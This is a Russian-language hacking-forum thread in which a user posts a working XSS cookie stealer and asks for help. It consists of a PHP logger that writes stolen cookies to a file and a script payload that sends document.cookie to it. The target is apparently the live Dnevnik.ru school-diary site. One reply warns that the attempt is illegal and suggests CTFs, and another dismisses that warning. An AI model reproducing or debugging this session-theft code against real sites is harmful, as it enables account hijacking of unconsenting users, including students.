• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема Проблема с XSS

Tayrus

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Нашел на одном сайте XSS, решил сделать куки стилер создал файл
в него закинул такой код
PHP: 
<?php
$cookie = $_GET['cookie'];
$log = fopen("xssed.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Вставляю в уязвимый параметр:
<ScRiPt>window.location = '' + document.cookie;</ScRiPt>
На сайте три печеньки
DnevnikAuth_a
_ym_uid
spauth
У меня записуется только _ym_uid
В чем проблема?
Хостинг 000webhost (бесплатный)
 
z3r0c10wn

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
93
Данная группа печенек обрабатывается в системах Электронных Дневников. И зарегистрирована на Дневник.ру.
Вы пытаетесь получить креды пользователей системы Электронного Дневника?
 
z3r0c10wn

z3r0c10wn

Grey Team
04.09.2017
226
295
BIT
93
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
 
Последнее редактирование:
  • Нравится
Реакции: IioS, Vertigo, G0p43R и ещё 2
nikos

nikos

Green Team
25.12.2016
507
198
BIT
0
z3r0c10wn сказал(а):
В нашей стране в плане bug bounty все достаточно сложно, поэтому рекомендую вам отказаться от вашей затеи.
Ваши действия могут быть обоснованными только если вы:
1) Имеете договор с Дневник.ру на пентест их продукат + подписанный NDA.
2) Работаете в компании Дневник.ру и в ваши служебные полномочия входит тестирование на уязвимости данного продукта.
3) Дневник.ру имеют открытую bug bounty программу.

И во всех этих случаях вам не стоит в открытую задавать такие вопросы на форумах.

Во всех остальных случаях вам могу быть представлены обвинения по статьям 272 ук РФ, а так же возможно в последствии припишут 273 ук РФ, как это у нас частенько бывает.
+ своими вопросами и постами а так же проиндексированными темами в поисковиках вы уже слили в СОРМ метаданные которые могут вас идентифицировать.


Настоятельно вам рекомендую не делать то, что вы делаете. А для обучения есть открытые CTF от Pentestit а так же dvwa
Нажмите, чтобы раскрыть...
А что такого пусть парень учится)
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ